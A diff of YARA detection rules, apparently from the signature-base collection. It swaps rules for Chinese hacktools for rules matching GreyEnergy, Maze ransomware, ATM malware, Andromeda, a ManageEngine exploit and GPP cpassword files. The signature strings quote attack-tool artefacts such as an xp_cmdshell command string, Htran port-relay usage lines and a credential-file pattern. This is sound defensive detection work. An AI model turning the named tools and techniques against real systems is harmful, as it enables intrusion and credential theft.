-		modified = "2022-12-21"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L1217-L1235"
+		id = "fc997540-075e-5f1c-9238-135c1572553b"
+		date = "2018-10-17"
+		modified = "2023-12-05"
+		reference = "https://www.welivesecurity.com/2018/10/17/greyenergy-updated-arsenal-dangerous-threat-actors/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_greyenergy.yar#L12-L29"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "ed86ff44bddcfdd630ade8ced39b4559316195ba"
-		logic_hash = "8959837257848a08240d0423971b9d3a850a7e9cc796de2c9b2d34814923f8ec"
+		logic_hash = "0cbdc156b7080608c1071feeb4826a70bb259c55139d74d019465c4bb5244260"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "6c52a5850a57bea43a0a52ff0e2d2179653b97ae5406e884aee63e1cf340f58b"
 
 	strings:
-		$s0 = "Watchdog thread %d waiting on Mutex" fullword ascii
-		$s1 = "Exploit ok run command" fullword ascii
-		$s2 = "\\epathobj_exp\\Release\\epathobj_exp.pdb" ascii
-		$s3 = "Alllocated userspace PATHRECORD () %p" fullword ascii
-		$s4 = "Mutex object did not timeout, list not patched" fullword ascii
+		$x1 = "%SystemRoot%\\System32\\thinmon.dll" fullword ascii
+		$s2 = "'Cannot delete list entry (fatal error)!9The module %s cannot be executed on this system (0x%.4x).%Enumerate all sessions on TSE" wide
+		$s8 = "cbecbecbecbecbecbecbecbecbecbecbecbecbecbecbecbecbecbecbecbecbecbecbecbe" ascii
+		$s14 = "configure the service" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 270KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 700KB and pe.imphash ( ) == "98d1ad672d0db4b4abdcda73cc9835cb" and all of them
 }
-rule SIGNATURE_BASE_Tools_Unknown : FILE
+rule SIGNATURE_BASE_APT_Greyenergy_Malware_Oct18_2 : FILE
 {
 	meta:
-		description = "Chinese Hacktool Set - file unknown.exe"
+		description = "Detects samples from Grey Energy report"
 		author = "Florian Roth (Nextron Systems)"
-		id = "2cb75a84-506d-5b67-8b1f-b91beb5a99a3"
-		date = "2015-06-13"
+		id = "50830741-ba3d-505c-bb21-8cedc2162f96"
+		date = "2018-10-17"
 		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L1237-L1254"
+		reference = "https://www.welivesecurity.com/2018/10/17/greyenergy-updated-arsenal-dangerous-threat-actors/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_greyenergy.yar#L31-L44"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "4be8270c4faa1827177e2310a00af2d5bcd2a59f"
-		logic_hash = "493bb63d4dd519efbf53a29fa44ef74f0a85943b2d9f49f11e3daa57c6b03d8e"
+		logic_hash = "600bc5b423ef3281bfc7ad7ab479aa1208b0144b0f4afd8c2d14f17b5e2c600b"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "c6a54912f77a39c8f909a66a940350dcd8474c7a1d0e215a878349f1b038c58a"
 
 	strings:
-		$s1 = "No data to read.$Can not bind in port range (%d - %d)" fullword wide
-		$s2 = "GET /ok.asp?id=1__sql__ HTTP/1.1" fullword ascii
-		$s3 = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" fullword ascii
-		$s4 = "Failed to clear tab control Failed to delete tab at index %d\"Failed to retrieve" wide
-		$s5 = "Host: 127.0.0.1" fullword ascii
+		$s1 = "WioGLtonuaptWmrnttfepgetneemVsnygnV" fullword ascii
+		$s2 = "PnSenariopoeKerGEtxrcy" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 2500KB and 4 of them
+		uint16( 0 ) == 0x5a4d and filesize < 300KB and 2 of them
 }
-rule SIGNATURE_BASE_PLUGIN_Ajunk : FILE
+rule SIGNATURE_BASE_APT_Greyenergy_Malware_Oct18_3 : FILE
 {
 	meta:
-		description = "Chinese Hacktool Set - file AJunk.dll"
+		description = "Detects samples from Grey Energy report"
 		author = "Florian Roth (Nextron Systems)"
-		id = "af92d01d-5e24-52f7-934a-0ad102fc7a93"
-		date = "2015-06-13"
+		id = "cc365dbf-1448-5219-95f5-d1154000f52d"
+		date = "2018-10-17"
 		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L1256-L1271"
+		reference = "https://www.welivesecurity.com/2018/10/17/greyenergy-updated-arsenal-dangerous-threat-actors/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_greyenergy.yar#L46-L60"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "eb430fcfe6d13b14ff6baa4b3f59817c0facec00"
-		logic_hash = "e37504aab506138493ddc0979697502819824ef00c7931599130fafb5d84a7a9"
+		logic_hash = "f4851f5381a4d8dea488d50ff11048052826c51428f8610bc5d3480ed254d32f"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "0db5e5b68dc4b8089197de9c1e345056f45c006b7b487f7d8d57b49ae385bad0"
 
 	strings:
-		$s1 = "AJunk.dll" fullword ascii
-		$s2 = "AJunk.DLL" fullword wide
-		$s3 = "AJunk Dynamic Link Library" fullword wide
+		$x1 = "USQTUNPPQONOPOQUMSNUTRMRRLVPUOPMROPMPMQTPNPONVUOUQOMMNNSRSRQQVTPPRSSNVSTURTMMOPTONSQTOMONQVMQNUSONTQTUTSRRPVTONUQNORQMRRNRUSPS" fullword ascii
+		$x2 = "tEMPiuP" fullword ascii
+		$x3 = "sryCEMieye" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 560KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 300KB and 1 of them
 }
-rule SIGNATURE_BASE_Iisputscanner : FILE
+
+rule SIGNATURE_BASE_APT_Greyenergy_Malware_Oct18_4 : FILE
 {
 	meta:
-		description = "Chinese Hacktool Set - file IISPutScanner.exe"
+		description = "Detects samples from Grey Energy report"
 		author = "Florian Roth (Nextron Systems)"
-		id = "699ee45d-c842-56eb-b55b-12a91e815a7b"
-		date = "2015-06-13"
+		id = "1a2df257-a639-5868-a005-690d64cfbf2b"
+		date = "2018-10-17"
 		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L1273-L1316"
+		reference = "https://www.welivesecurity.com/2018/10/17/greyenergy-updated-arsenal-dangerous-threat-actors/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_greyenergy.yar#L62-L82"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "9869c70d6a9ec2312c749aa17d4da362fa6e2592"
-		logic_hash = "b2af9003cef528610280866bf00a9716b4421a5f7c65e7c8ec3202af9a592de1"
+		logic_hash = "c845be8b56dc9aa9f0eaec2a67c4baef9c9b4fd1789e96cd781e3876721b1297"
 		score = 75
-		quality = 83
+		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "6974b8acf6a8f7684673b01753c3a8248a1c491900cccf771db744ca0442f96a"
+		hash2 = "165a7853ef51e96ce3f88bb33f928925b24ca5336e49845fc5fc556812092740"
+		hash3 = "4470e40f63443aa27187a36bbb0c2f4def42b589b61433630df842b6e365ae3d"
+		hash4 = "c21cf6018c2ee0a90b9d2c401aae8071c90b5a4bc9848a94d678d77209464f79"
 
 	strings:
-		$s2 = "KERNEL32.DLL" fullword ascii
-		$s3 = "ADVAPI32.DLL" fullword ascii
-		$s4 = "VERSION.DLL" fullword ascii
-		$s5 = "WSOCK32.DLL" fullword ascii
-		$s6 = "COMCTL32.DLL" fullword ascii
-		$s7 = "GDI32.DLL" fullword ascii
-		$s8 = "SHELL32.DLL" fullword ascii
-		$s9 = "USER32.DLL" fullword ascii
-		$s10 = "OLEAUT32.DLL" fullword ascii
-		$s11 = "LoadLibraryA" fullword ascii
-		$s12 = "GetProcAddress" fullword ascii
-		$s13 = "VirtualProtect" fullword ascii
-		$s14 = "VirtualAlloc" fullword ascii
-		$s15 = "VirtualFree" fullword ascii
-		$s16 = "ExitProcess" fullword ascii
-		$s17 = "RegCloseKey" fullword ascii
-		$s18 = "GetFileVersionInfoA" fullword ascii
-		$s19 = "ImageList_Add" fullword ascii
-		$s20 = "BitBlt" fullword ascii
-		$s21 = "ShellExecuteA" fullword ascii
-		$s22 = "ActivateKeyboardLayout" fullword ascii
-		$s23 = "BBABORT" fullword wide
-		$s25 = "BBCANCEL" fullword wide
-		$s26 = "BBCLOSE" fullword wide
-		$s27 = "BBHELP" fullword wide
-		$s28 = "BBIGNORE" fullword wide
-		$s29 = "PREVIEWGLYPH" fullword wide
-		$s30 = "DLGTEMPLATE" fullword wide
-		$s31 = "TABOUTBOX" fullword wide
-		$s32 = "TFORM1" fullword wide
-		$s33 = "MAINICON" fullword wide
+		$x1 = "iiodttd.eWt" fullword ascii
+		$x2 = "irnnaar-ite-ornaa-naa-asoeienaeaanlagoeas:acnuihaaa" fullword ascii
+		$x3 = "NURVNTURVORSMSPPRTQMPTTQOQRP" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 500KB and filesize > 350KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 300KB and ( pe.imphash ( ) == "279adfbd42308a07b3131ee57d067b3e" or 1 of them )
 }
-rule SIGNATURE_BASE_Idtools_For_Winxp_Idttool_2 : FILE
+rule SIGNATURE_BASE_APT_Greyenergy_Malware_Oct18_5 : FILE
 {
 	meta:
-		description = "Chinese Hacktool Set - file IdtTool.sys"
+		description = "Detects samples from Grey Energy report"
 		author = "Florian Roth (Nextron Systems)"
-		id = "0312be49-c262-5143-abfc-02d428552b86"
-		date = "2015-06-13"
+		id = "a8c4517d-912d-5264-b9ab-acdf37fc4d56"
+		date = "2018-10-17"
 		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L1318-L1335"
+		reference = "https://www.welivesecurity.com/2018/10/17/greyenergy-updated-arsenal-dangerous-threat-actors/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_greyenergy.yar#L84-L97"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "07feb31dd21d6f97614118b8a0adf231f8541a67"
-		logic_hash = "831f42abd7374b2ca2b4115a73aae2123e2212b0854d4cc0950b8e66a28e38a3"
+		logic_hash = "3ced67c514d54324b41a4a4a92c1d3138e75380f3129b39ae92c1895c267acb2"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "037723bdb9100d19bf15c5c21b649db5f3f61e421e76abe9db86105f1e75847b"
+		hash2 = "b602ce32b7647705d68aedbaaf4485f1a68253f8f8132bd5d5f77284a6c2d8bb"
 
 	strings:
-		$s0 = "\\Device\\devIdtTool" wide
-		$s1 = "IoDeleteSymbolicLink" fullword ascii
-		$s3 = "IoDeleteDevice" fullword ascii
-		$s6 = "IoCreateSymbolicLink" fullword ascii
-		$s7 = "IoCreateDevice" fullword ascii
+		$s12 = "WespySSld.eQ" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 7KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 300KB and 1 of them
 }
-rule SIGNATURE_BASE_Hkmjjiis6 : FILE
+rule SIGNATURE_BASE_EXPL_Manageengine_CVE_2022_47966_Jan23_1
 {
 	meta:
-		description = "Chinese Hacktool Set - file hkmjjiis6.exe"
+		description = "Detects indicators of exploitation of ManageEngine vulnerability as described by Horizon3"
 		author = "Florian Roth (Nextron Systems)"
-		id = "9618c6ec-1557-5b1b-bebc-1c220bb3aba4"
-		date = "2015-06-13"
+		id = "07535b9c-8611-5a46-bcd7-f94070de2aea"
+		date = "2023-01-13"
 		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L1337-L1358"
+		reference = "https://www.horizon3.ai/manageengine-cve-2022-47966-iocs/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_manageengine_jan23.yar#L2-L14"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "4cbc6344c6712fa819683a4bd7b53f78ea4047d7"
-		logic_hash = "4ea95b7a5bd24e0dfdcef045d101b7f15e18b20f1328901bb340d9aaad336981"
+		logic_hash = "a62064e4f12632ba6c14cbbd9369ee919536334f19021a177c126b5dff7e568c"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = ""
 
 	strings:
-		$s1 = "comspec" fullword ascii
-		$s2 = "user32.dlly" ascii
-		$s3 = "runtime error" ascii
-		$s4 = "WinSta0\\Defau" ascii
-		$s5 = "AppIDFlags" fullword ascii
-		$s6 = "GetLag" fullword ascii
-		$s7 = "* FROM IIsWebInfo" ascii
-		$s8 = "wmiprvse.exe" ascii
-		$s9 = "LookupAcc" ascii
+		$ = "]: com.adventnet.authentication.saml.SamlException: Signature validation failed. SAML Response rejected|"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 70KB and all of them
+		1 of them
 }
-rule SIGNATURE_BASE_Dos_Lcx : FILE
+rule SIGNATURE_BASE_Groups_Cpassword : FILE
 {
 	meta:
-		description = "Chinese Hacktool Set - file lcx.exe"
+		description = "Groups XML contains cpassword value, which is decrypted password - key is in MSDN http://goo.gl/mHrC8P"
 		author = "Florian Roth (Nextron Systems)"
-		id = "2f443673-bfed-5ce3-a0e6-6b59f27c9658"
-		date = "2015-06-13"
+		id = "37036df9-871f-5ecd-acac-6a064d298115"
+		date = "2015-09-08"
 		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L1360-L1384"
+		reference = "http://www.grouppolicy.biz/2013/11/why-passwords-in-group-policy-preference-are-very-bad/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_gpp_cpassword.yar#L2-L20"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "b6ad5dd13592160d9f052bb47b0d6a87b80a406d"
-		logic_hash = "bbe215fb27825b4f4bbfa71808ac945f341efbc70a21f79689065982a843d7f1"
-		score = 75
+		logic_hash = "de37dc77d9a2462f5d54ad5225405c6d95dad39e67a893f5442b26dc641a20f9"
+		score = 50
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "c:\\Users\\careful_snow\\" ascii
-		$s1 = "Desktop\\Htran\\Release\\Htran.pdb" ascii
-		$s3 = "[SERVER]connection to %s:%d error" fullword ascii
-		$s4 = "-tran  <ConnectPort> <TransmitHost> <TransmitPort>" fullword ascii
-		$s6 = "=========== Code by lion & bkbll, Welcome to [url]http://www.cnhonker.com[/url] " ascii
-		$s7 = "[-] There is a error...Create a new connection." fullword ascii
-		$s8 = "[+] Accept a Client on port %d from %s" fullword ascii
-		$s11 = "-slave  <ConnectHost> <ConnectPort> <TransmitHost> <TransmitPort>" fullword ascii
-		$s13 = "[+] Make a Connection to %s:%d...." fullword ascii
-		$s16 = "-listen <ConnectPort> <TransmitPort>" fullword ascii
-		$s17 = "[+] Waiting another Client on port:%d...." fullword ascii
-		$s18 = "[+] Accept a Client on port %d from %s ......" fullword ascii
+		$s1 = / cpassword=\"[^\"]/ ascii
+		$s2 = " changeLogon=" ascii
+		$s3 = " description=" ascii
+		$s4 = " acctDisabled=" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 100KB and 2 of them
+		uint32be( 0 ) == 0x3C3F786D and filesize < 1000KB and all of ( $s* )
 }
-rule SIGNATURE_BASE_X_Way2_5_X_Way : FILE
+rule SIGNATURE_BASE_Andromeda_Malbot_Jun_1A : FILE
 {
 	meta:
-		description = "Chinese Hacktool Set - file X-way.exe"
+		description = "Detects a malicious Worm Andromeda / RETADUP"
 		author = "Florian Roth (Nextron Systems)"
-		id = "8e878671-2a7c-5c6e-a905-05d303f42e0f"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L1386-L1407"
+		id = "42ee6ba3-85ea-5369-bd9b-8ffdec6e17bc"
+		date = "2017-06-30"
+		modified = "2022-12-21"
+		reference = "http://blog.trendmicro.com/trendlabs-security-intelligence/information-stealer-found-hitting-israeli-hospitals/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_andromeda_jun17.yar#L12-L38"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "8ba8530fbda3e8342e8d4feabbf98c66a322dac6"
-		logic_hash = "6261de5db1e7527f7726effe26ed5f88638e6cb378db4c99183dddcd42ae231f"
+		logic_hash = "5958608ad5527628c4b6cbe08badbff39a50dcdb6cf603f6fbb5fa32ef61c0c7"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "3c223bbf83ac2f91c79383a53ed15b0c8ffe2caa1bf52b26c17fd72278dc7ef9"
+		hash2 = "73cecc67bb12cf5a837af9fba15b7792a6f1a746b246b34f8ed251c4372f1a98"
+		hash3 = "66035cc81e811735beab573013950153749b02703eae58b90430646f6e3e3eb4"
+		hash4 = "42a02e6cf7c424c12f078fca21805de072842ec52a25ea87bd7d53e7feb536ed"
 
 	strings:
-		$s0 = "TTFTPSERVERFRM" fullword wide
-		$s1 = "TPORTSCANSETFRM" fullword wide
-		$s2 = "TIISSHELLFRM" fullword wide
-		$s3 = "TADVSCANSETFRM" fullword wide
-		$s4 = "ntwdblib.dll" fullword ascii
-		$s5 = "TSNIFFERFRM" fullword wide
-		$s6 = "TCRACKSETFRM" fullword wide
-		$s7 = "TCRACKFRM" fullword wide
-		$s8 = "dbnextrow" fullword ascii
+		$x1 = "%temp%\\FolderN\\name.exe" fullword wide
+		$x2 = "%temp%\\FolderN\\name.exe.lnk" fullword wide
+		$x3 = "\\Startup\\name.exe" wide
+		$x4 = "firefox.exe.exe" fullword wide
+		$x5 = "\\Desktop\\New folder\\dark.exe" wide
+		$x6 = "\\x86\\Release\\word.pdb" ascii
+		$x7 = "\\obj\\Release\\botkill.pdb" ascii
+		$s1 = "4System.Web.Services.Protocols.SoapHttpClientProtocol" fullword ascii
+		$s2 = "svhost.exe" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 1000KB and 5 of them
+		uint16( 0 ) == 0x5a4d and filesize < 2000KB and ( 1 of ( $x* ) or 2 of them )
 }
-rule SIGNATURE_BASE_Tools_Sqlcmd : FILE
+rule SIGNATURE_BASE_Crime_Win32_Ransom_Maze_Dll_1 : FILE
 {
 	meta:
-		description = "Chinese Hacktool Set - file Sqlcmd.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "26e29826-d4bb-55d0-9331-a91e4473daca"
-		date = "2015-06-13"
+		description = "Detects Maze ransomware payload dll unpacked"
+		author = "@VK_Intel"
+		id = "873aea2b-2dd4-5682-b979-35e73fbc189f"
+		date = "2020-04-18"
 		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L1409-L1428"
+		reference = "https://twitter.com/VK_Intel/status/1251388507219726338"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_maze_ransomware.yar#L1-L17"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "99d56476e539750c599f76391d717c51c4955a33"
-		logic_hash = "aa600f7c56d72d767e9ca51d8b1ee2b2c62302ea1afbed39e4670debd30c5247"
+		logic_hash = "5b76636c05141687fa5cc507ac67d6a5d1f6c89166fd302e94fe61b412451159"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tlp = "white"
 
 	strings:
-		$s0 = "[Usage]:  %s <HostName|IP> <UserName> <Password>" fullword ascii
-		$s1 = "=============By uhhuhy(Feb 18,2003) - http://www.cnhonker.net=============" fullword ascii
-		$s4 = "Cool! Connected to SQL server on %s successfully!" fullword ascii
-		$s5 = "EXEC master..xp_cmdshell \"%s\"" fullword ascii
-		$s6 = "=======================Sqlcmd v0.21 For HScan v1.20=======================" fullword ascii
-		$s10 = "Error,exit!" fullword ascii
-		$s11 = "Sqlcmd>" fullword ascii
+		$str1 = "Maze Ransomware" wide
+		$str2 = "--logging" wide
+		$str3 = "DECRYPT-FILES.txt" wide
+		$tick_server_call = { ff ?? ?? 8b ?? ?? ?? ?? ?? ff d6 8b ?? 89 f9 50 ff ?? ?? ff d6 8d ?? ?? ?? 89 ?? ?? ?? 56 e8 ?? ?? ?? ?? 83 c4 04 b9 67 66 66 66 89 c5 f7 e9 89 d0 d1 fa c1 e8 1f 01 c2 8d ?? ?? 29 c5 56 e8 ?? ?? ?? ?? 83 c4 04 b9 56 55 55 55 89 c6 f7 e9 89 f9 89 d0 c1 e8 1f 01 d0 8d ?? ?? 29 c6 8b ?? 55 56 ff ?? ?? 85 c0 0f ?? ?? ?? ?? ?? 89 ?? ?? ?? 8b ?? ?? ?? ?? ?? 89 c5 50 ff d3 89 c6 ff ?? ?? ?? ff d3 8b ?? ?? ?? 01 f0 3d ff 03 00 00 0f ?? ?? ?? ?? ?? 55 ff ?? ?? ?? 68 a2 95 c3 00 53 ff ?? ?? ?? ?? ?? 83 c4 10 c6 ?? ?? ?? c6 ?? ?? ?? ?? }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 40KB and 3 of them
+		( uint16( 0 ) == 0x5a4d and 3 of them ) or all of them
 }
-rule SIGNATURE_BASE_Sword1_5 : FILE
+rule SIGNATURE_BASE_ATM_Malware_XFSADM_1 : FILE
 {
 	meta:
-		description = "Chinese Hacktool Set - file Sword1.5.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "dff8666a-0373-5605-9012-92b2b3ec71ea"
-		date = "2015-06-13"
+		description = "Detects ATM Malware XFSADM"
+		author = "Frank Boldewin (@r3c0nst), modified by Florian Roth"
+		id = "7bd7e194-1cf1-5d12-809b-25aaf7f62ca3"
+		date = "2019-06-21"
 		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L1430-L1449"
+		reference = "https://twitter.com/r3c0nst/status/1149043362244308992"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_atm_xfsadm.yar#L1-L23"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "96ee5c98e982aa8ed92cb4cedb85c7fda873740f"
-		logic_hash = "09e09f7ea16dc917388cbccb22a7abfed9b693a33d61698f0e838f029402c256"
+		logic_hash = "f2c1761407c5e499be43e546badd27428821f828a470fd3e3dcddd08db04aaa5"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "2740bd2b7aa0eaa8de2135dd710eb669d4c4c91d29eefbf54f1b81165ad2da4d"
 
 	strings:
-		$s3 = "http://www.ip138.com/ip2city.asp" fullword wide
-		$s4 = "http://www.md5decrypter.co.uk/feed/api.aspx?" fullword wide
-		$s6 = "ListBox_Command" fullword wide
-		$s13 = "md=7fef6171469e80d32c0559f88b377245&submit=MD5+Crack" fullword wide
-		$s18 = "\\Set.ini" wide
-		$s19 = "OpenFileDialog1" fullword wide
-		$s20 = " (*.txt)|*.txt" fullword wide
+		$Code1 = {68 88 13 00 00 FF 35 ?? ?? ?? ?? 68 CF 00 00 00 50 FF 15}
+		$Code2 = {68 98 01 00 00 50 FF 15}
+		$Mutex = "myXFSADM" wide
+		$MSXFSDIR = "C:\\Windows\\System32\\msxfs.dll" ascii
+		$XFSCommand1 = "WfsExecute" ascii
+		$XFSCommand2 = "WfsGetInfo" ascii
+		$PDB = "C:\\Work64\\ADM\\XFS\\Release\\XFS.pdb" ascii
+		$WindowName = "XFS ADM" wide
+		$FindWindow = "ADM rec" wide
+		$LogFile = "xfs.log" ascii
+		$TmpFile = "~pipe.tmp" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 400KB and 4 of them
+		uint16( 0 ) == 0x5A4D and filesize < 500KB and ( 4 of them or $PDB )
 }
-rule SIGNATURE_BASE_Tools_Scan : FILE
+rule SIGNATURE_BASE_LOG_Teamviewer_Connect_Chinese_Keyboard_Layout
 {
 	meta:
-		description = "Chinese Hacktool Set - file scan.exe"
+		description = "Detects a suspicious TeamViewer log entry stating that the remote systems had a Chinese keyboard layout"
 		author = "Florian Roth (Nextron Systems)"
-		id = "4601d4d0-2b7e-5937-87b6-df80ab373752"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L1451-L1466"
+		id = "f901818b-5150-540f-b645-686c12784a38"
+		date = "2019-10-12"
+		modified = "2020-12-16"
+		reference = "https://docs.microsoft.com/en-us/windows-hardware/manufacture/desktop/default-input-locales-for-windows-language-packs"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/log_teamviewer_keyboard_layouts.yar#L2-L21"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "c580a0cc41997e840d2c0f83962e7f8b636a5a13"
-		logic_hash = "d8bf2e4a4634f74ce548a5824090502f2ccef382bdbcaf795df711e88a325912"
-		score = 75
-		quality = 81
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		logic_hash = "ba3bc7cbdfc5a47f6bc4cd9049c52eb95d25465af107ae3d068ef785b714279a"
+		score = 60
+		quality = 85
+		tags = ""
+		limit = "Logscan"
 
 	strings:
-		$s2 = "Shanlu Studio" fullword wide
-		$s3 = "_AutoAttackMain" fullword ascii
-		$s4 = "_frmIpToAddr" fullword ascii
+		$x1 = "Changing keyboard layout to: 0804" ascii
+		$x2 = "Changing keyboard layout to: 042a"
+		$fp1 = "Changing keyboard layout to: 08040804" ascii
+		$fp2 = "Changing keyboard layout to: 042a042a" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 3000KB and all of them
+		(#x1 + #x2 ) > ( #fp1 + #fp2 )
 }
-rule SIGNATURE_BASE_Dos_C : FILE
+rule SIGNATURE_BASE_LOG_Teamviewer_Connect_Russian_Keyboard_Layout
 {
 	meta:
-		description = "Chinese Hacktool Set - file c.exe"
+		description = "Detects a suspicious TeamViewer log entry stating that the remote systems had a Russian keyboard layout"
 		author = "Florian Roth (Nextron Systems)"
-		id = "2e8319de-fe54-5083-968c-4707d127f072"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L1468-L1487"
+		id = "360a1cca-2a64-5fd8-bcde-f49e1b17281e"
+		date = "2019-10-12"
